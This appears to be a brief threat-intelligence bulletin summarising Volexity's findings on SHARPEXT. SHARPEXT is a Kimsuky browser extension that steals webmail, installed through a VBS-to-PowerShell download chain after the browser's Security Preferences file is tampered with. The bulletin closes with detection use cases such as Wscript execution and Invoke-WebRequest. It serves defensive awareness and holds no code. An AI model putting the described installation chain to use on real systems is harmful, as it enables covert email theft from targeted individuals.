Volexity Identifies Malicious Browser Extension SHARPEXT
Industries: Defense, Government | Level: Tactical | Source: Volexity
SHARPEXT, a malicious browser extension has been identified by Volexity with capabilities to steal mail data from Microsoft Edge, Google Chrome, and Whale web browsers. The malware is assessed to be associated with the North Korean threat actor group, Kimsuky "Volexity frequently observes SharpTongue targeting and victimizing individuals working for organizations in the United States, Europe, and South Korea who work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea." Volexity has tracked the malware for over a year through various engagements, observing the attacker's advancing the malware's development from its early stages. The malware has evolved into a dangerous data exfiltration tool "Volexity’s own visibility shows the extension has been quite successful, as logs obtained by Volexity show the attacker was able to successfully steal thousands of emails from multiple victims through the malware's deployment." The execution of SHARPEXT requires the attacker to have access to and modify the browser's Security Preferences file needed to execute. SHARPEXT's installation kicked off through a VBS script downloading and executing a malicious PowerShell script. The SHARPEXT malware is capable of exfiltrating "data from a victim's webmail account as they browse it."
- VBS Script Downloads and Executes Malicious Payloads
Anvilogic Use Cases:
- Wscript/Cscript Execution
- Invoke-WebRequest Command
- Executable Create Script Process